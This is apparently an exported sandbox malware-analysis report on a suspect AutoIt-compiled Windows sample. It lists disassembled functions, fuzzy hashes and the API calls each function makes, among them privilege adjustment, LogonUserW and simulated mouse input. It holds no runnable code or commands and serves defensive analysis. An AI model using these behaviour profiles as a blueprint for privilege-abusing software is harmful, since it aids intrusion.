Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: d2230cb0f459cd90547eb4d7fbf2804f9bf7954f30ea937271a5c2ee1660b049
Instruction ID: 75e7aa365aa2d73fec1536b1735f9321fffdab0523bab277042d2e066fda7fd1
Opcode Fuzzy Hash: d2230cb0f459cd90547eb4d7fbf2804f9bf7954f30ea937271a5c2ee1660b049
Instruction Fuzzy Hash: 1B216035A00208EFCF00EFA5D885EEDBBB8FF49310F1480AAE905AB351CB35A915CB51

Function 007C87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00790DB6: std::exception::exception.LIBCMT ref: 00790DEC
Part of subcall function 00790DB6: __CxxThrowException@8.LIBCMT ref: 00790E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007C882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007C8858
GetLastError.KERNEL32 ref: 007C8865

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: fbc3ea18c3d8f34f557b87780ca65b75e378d052f1bf5849d03fb3d07190880e
Instruction ID: b009e0edbcdb026298642043db985ec89bf12de0c6cfd3bc5e6888e359c09156
Opcode Fuzzy Hash: fbc3ea18c3d8f34f557b87780ca65b75e378d052f1bf5849d03fb3d07190880e
Instruction Fuzzy Hash: D0116DB2524204AFEB18EFA4EC85D6BB7E8EF44711B20852EE45597641EE34AC408B64

Function 007C874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007C8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007C878B
FreeSid.ADVAPI32(?), ref: 007C879B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 549869dc768664127715495444dd74abfa23099c17e59df42ac4f3f376957e90
Instruction ID: 4abe0cd0465b9e334d9de0180e1ad739ba93d10267e3c16081230bc2e1dbf58d
Opcode Fuzzy Hash: 549869dc768664127715495444dd74abfa23099c17e59df42ac4f3f376957e90
Instruction Fuzzy Hash: B5F03775A11208BBDB00DFE49C89ABEBBB8EF08201F1084A9E901E2181EA756A048B54

Function 007D4C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 007D4CB3

Strings

DOWN, xrefs: 007D4C98

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: d07fb7dc2626e21f39d9a6c4ae59e91ee80921249938be4de2f9a06e58f2dfd3
Instruction ID: 4e05246e3d0c323d928b0989a9e78af9c5a17fb68a6e77866066452795fb8b95
Opcode Fuzzy Hash: d07fb7dc2626e21f39d9a6c4ae59e91ee80921249938be4de2f9a06e58f2dfd3
Instruction Fuzzy Hash: 77E04F221A973179A9143618FC0BEF7075C8B163317500107F814D52C1EDAC1C8268B8

Function 007DC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007DC6FB
FindClose.KERNEL32(00000000), ref: 007DC72B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: bf773fc2bb9e2ff52a38167626abd7fcddae4ddc1f7911ed93f205057b6741d2
Instruction ID: 387d841fc0efa7affcdbd4ffe89811c0ae7e739046711292b4bb058a757c5300
Opcode Fuzzy Hash: bf773fc2bb9e2ff52a38167626abd7fcddae4ddc1f7911ed93f205057b6741d2
Instruction Fuzzy Hash: EF115E726006049FDB10DF29D889A2AF7E9FF85364F10C55EF9A9D7391DB34A805CB81

Function 007DA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007E9468,?,007FFB84,?), ref: 007DA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007E9468,?,007FFB84,?), ref: 007DA0A9

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 0d195a93ca4c69f14ce18bd18f90079dc16cb606c2cece29c4d8da9d082feb63
Instruction ID: dfa0cdc34d471cb12f005443c68b2090be4cf74f6621e4910aa2a6c53abbf221
Opcode Fuzzy Hash: 0d195a93ca4c69f14ce18bd18f90079dc16cb606c2cece29c4d8da9d082feb63
Instruction Fuzzy Hash: 14F0823510522DBBDB21AFA4CC48FEA776CBF09361F008266F909D6281DA749940CBA1

Function 007C81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007C8309), ref: 007C81E0
CloseHandle.KERNEL32(?,?,007C8309), ref: 007C81F2

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: f2226e4c000a73a893866d16b387b5459f25181b4704a962ea729313ebd9e674
Instruction ID: 87b7ae839e3573bc53dd2ffadacf8d700bded5a427f203ee3b47b8220684c0bf
Opcode Fuzzy Hash: f2226e4c000a73a893866d16b387b5459f25181b4704a962ea729313ebd9e674
Instruction Fuzzy Hash: F9E0B672010611EFEB256B74FC09E777BEAEF04310714882DF8A684470DB66AC91DB54

Function 0079A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00798D57,?,?,?,00000001), ref: 0079A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0079A163

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d2882755e8b234ae5a54a142f587dca1eb44d4e36a135d99b909151ca8de2e2c
Instruction ID: c86c6c654cecb55e989d2ed6a0d9d28f5884f137ee333d914fb3f5f45bd488ef
Opcode Fuzzy Hash: d2882755e8b234ae5a54a142f587dca1eb44d4e36a135d99b909151ca8de2e2c
Instruction Fuzzy Hash: CEB09231054208ABCA102B91EC09BA83F6AEF44AA2F408020F60D84060CF665450CA99

Function 0079F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8953b4374d1d07391f760557d2521c65e1584041f02bd12fc3150cc07b2e79ca
Instruction ID: 48e7437fa3ddd27d03019f5173058f2750e562cc6e5fac2a78353e6a5359f069
Opcode Fuzzy Hash: 8953b4374d1d07391f760557d2521c65e1584041f02bd12fc3150cc07b2e79ca
Instruction Fuzzy Hash: 4E32F362D29F414DDB639634D832336A249BFB73E4F15D737E81AF5AA6EB28D4834100

Function 007A242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c47d9014470771eb7955be7751e5871602dd9ced32511ec4af770dc3541a0841
Instruction ID: 9622312bd94ac6a29c914c16658c38bd3af033241984f4b34756a0e8da0be9aa
Opcode Fuzzy Hash: c47d9014470771eb7955be7751e5871602dd9ced32511ec4af770dc3541a0841
Instruction Fuzzy Hash: 65B10F21E2AF404DD36796398831336BA5CBFBB6D5F52D71BFC2670E62EB2185834141

Function 007D8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 007D889B

Part of subcall function 0079520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007D8F6E,00000000,?,?,?,?,007D911F,00000000,?), ref: 00795213
Part of subcall function 0079520A: __aulldiv.LIBCMT ref: 00795233

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 23878dd2747311df4e5467e7d60cc499202872ecaa5bf7b2b8d6ef3ec75a9aea
Instruction ID: 7a4a5d24e1447aefeef7574ab645a2fe5511c94ec55a953401e1cda3447ff098
Opcode Fuzzy Hash: 23878dd2747311df4e5467e7d60cc499202872ecaa5bf7b2b8d6ef3ec75a9aea
Instruction Fuzzy Hash: 1A21AF72635610CBC729CF29D841A52B3E1EBA5311B688E6DE1F5CB2C0DA38B905DB94

Function 007C87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007C8389), ref: 007C87D1

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: ada548a1507e9b155c22a6f4f9225892dc479a249dd38c11ed93de64c7a4e4f4
Instruction ID: a7069c5790cca633f56aa038a197fbdb5761d4cb84eda0dc98882d36bf7f040c
Opcode Fuzzy Hash: ada548a1507e9b155c22a6f4f9225892dc479a249dd38c11ed93de64c7a4e4f4
Instruction Fuzzy Hash: ECD05E3226050EABEF018EA4DC01EBE3B69EB04B01F408111FE15C50A1CB75D835EB60

Function 0079A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0079A12A

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 199bae77c952c1063dca6b289d8a7823840934d806520333e2c57c1031870e58
Instruction ID: f5fcb1f8bf6b5f1228b8e4defa6afb61b61419c6b4a8142c82eb532e1c40cd3e
Opcode Fuzzy Hash: 199bae77c952c1063dca6b289d8a7823840934d806520333e2c57c1031870e58
Instruction Fuzzy Hash: BCA0113000020CABCA002B82EC088A8BFAEEE002A0B008020F80C800228B32A8208A88

Function 00788808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c36556ab628d87c6347623b62e62b0cff497d2ad22b32a81ecfbccfdd55f1f0
Instruction ID: 44c535d6af7408af062e1b0f312500e5d420fb045d2c765334adb914a1ddd784
Opcode Fuzzy Hash: 2c36556ab628d87c6347623b62e62b0cff497d2ad22b32a81ecfbccfdd55f1f0
Instruction Fuzzy Hash: E2223330A44506CBDF7CAA24C894B7CB7A1FB41344FA8806ED9528B592EB7DADD1C743

Function 007921C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: bc925b0ce5eec8b748766370d66c77dfe5a67d6698db595b014b28c0a68da4a7
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: CAC198322051930ADF2D5639E43403EFBA15EA27B135A07ADD4B3CB5D5EE18CA76D620

Function 007925FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: a2603ba697587157b26a82533df9651e4faab12582df95c61519a02e6b23032c
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 05C1A73320519309DF2D5639D43403EBBA15EA27B135A07ADD4B3DB5D5EE18CA35D620

Function 00791978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 7d5afb5827451b32c2fb75f25e15cec0e3a88a8db9d7c448d5e370a650a1d7b0
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 62C1833230519309DF2D4639E47413EBBA19EA27B139A07ADD4B3CB5D4EE28CA75D620

Function 007E7806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007E785B
DeleteObject.GDI32(00000000), ref: 007E786D
DestroyWindow.USER32 ref: 007E787B
GetDesktopWindow.USER32 ref: 007E7895
GetWindowRect.USER32(00000000), ref: 007E789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007E79DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007E79ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7A35
GetClientRect.USER32(00000000,?), ref: 007E7A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 007E7A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7ABB
GlobalLock.KERNEL32(00000000), ref: 007E7AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7AD3
GlobalUnlock.KERNEL32(00000000), ref: 007E7ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7AE3
GlobalFree.KERNEL32(00000000), ref: 007E7AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00802CAC,00000000), ref: 007E7B16
GlobalFree.KERNEL32(00000000), ref: 007E7B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 007E7B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 007E7B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007E7D7A

Strings

, xrefs: 007E7D00
static, xrefs: 007E7A75, 007E7BCC
AutoIt v3, xrefs: 007E7A2D
DISPLAY, xrefs: 007E7BDD

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: ce8a3bb4f5412bef50a704b88024dbce185c384849a6a0ea8bc19541edfd2222
Instruction ID: 6a6a8809967eb50d2fb7a1f7e67f8ced5fccae06e403d9a406b4fce949f067b5
Opcode Fuzzy Hash: ce8a3bb4f5412bef50a704b88024dbce185c384849a6a0ea8bc19541edfd2222
Instruction Fuzzy Hash: EC027C71A01119EFDB14DFA5DC89EAE7BB9FF48310F108158F915AB2A1CB38AD01CB64

Function 007F356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,007FF910), ref: 007F3627
IsWindowVisible.USER32(?), ref: 007F364B

Strings

TABRIGHT, xrefs: 007F369D
SENDCOMMANDID, xrefs: 007F39DA
EDITPASTE, xrefs: 007F395F
GETCURRENTLINE, xrefs: 007F38ED
SHOWDROPDOWN, xrefs: 007F36E0
ADDSTRING, xrefs: 007F3716
CURRENTTAB, xrefs: 007F36BD
FINDSTRING, xrefs: 007F3776
ISCHECKED, xrefs: 007F3839
SETCURRENTSELECTION, xrefs: 007F37B6
UNCHECK, xrefs: 007F3883
GETCURRENTSELECTION, xrefs: 007F37E3
SELECTSTRING, xrefs: 007F3806
DELSTRING, xrefs: 007F3749
GETLINE, xrefs: 007F399B
GETLINECOUNT, xrefs: 007F38C6
HIDEDROPDOWN, xrefs: 007F3700
CHECK, xrefs: 007F386D
GETSELECTED, xrefs: 007F38A3
ISVISIBLE, xrefs: 007F3637
GETCURRENTCOL, xrefs: 007F3928
TABLEFT, xrefs: 007F3687
ISENABLED, xrefs: 007F366B

Memory Dump Source

